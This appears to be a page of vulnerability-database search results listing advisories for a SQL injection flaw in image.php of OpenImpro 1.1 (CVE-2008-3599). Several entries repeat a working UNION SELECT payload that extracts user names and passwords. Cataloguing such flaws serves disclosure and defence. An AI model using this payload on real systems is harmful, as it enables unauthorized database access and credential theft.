11 matches found
EUVD-2008-3585
Malware in sbrugna...
openimpro-sql.txt
OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip exploit: target.com/image.php?id=-1 union select 1,2,concatfirstname,0x3a,lastname,0x3a,password,4,5,6 from imperson -- Description: when you do the injection you will ...
CVE-2008-3599
SQL injection vulnerability in image.php in OpenImpro 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter...
Sql injection
SQL injection vulnerability in image.php in OpenImpro 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2008-3599
SQL injection vulnerability in image.php in OpenImpro 1.1 allows remote attackers to execute arbitrary SQL commands via the id parameter...
CVE-2008-3599
CVE-2008-3599 : OpenImpro 1.1 has a SQL injection in image.php via the id parameter that allows remote attackers to execute arbitrary SQL commands. The underlying flaw is an unsafeguarded input used in SQL queries, enabling PII/DB manipulation and potential data exposure or modification as indica...
OpenImpro 'image.php' SQL注入漏洞
BUGTRAQ ID:30631 CNCAN ID:CNCAN-2008081205 OpenImpro是一款基于PHP的WEB应用程序。 OpenImpro不正确处理用户提交的输入,远程攻击者可以利用漏洞进行SQL注入攻击,获得敏感信息或操作数据库。 问题是由于'image.php'脚本不正确过滤"id"参数,构建恶意SQL查询作为参数数据,可更改原来的SQL逻辑,可获得敏感信息或操作数据库。 OpenImpro 1.1 目前没有解决方案提供: http://sourceforge.net/projects/openimpro/...
OpenImpro 1.1 - image.php SQL Injection
OpenImpro 1.1 - image.php SQL Injection OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip exploit: target.com/image.php?id=-1 union select 1,2,concatfirstname,0x3a,lastname,0x3a,password,4,5,6 from imperson --...
OpenImpro 1.1 (image.php id) SQL Injection Vulnerability
No description provided by source. OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip exploit: target.com/image.php?id=-1 union select 1,2,concatfirstname,0x3a,lastname,0x3a,password,4,5,6 from imperson -- Description:...
OpenImpro 1.1 - 'image.php' SQL Injection
OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip exploit: target.com/image.php?id=-1 union select 1,2,concatfirstname,0x3a,lastname,0x3a,password,4,5,6 from imperson -- Description: when you do the injection you will ...
OpenImpro 1.1 (image.php id) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ======================================================== OpenImpro 1.1 image.php id SQL Injection Vulnerability ======================================================== OpenImpro 1.1id Sql Injection Vulnerability Author: nuclear script:...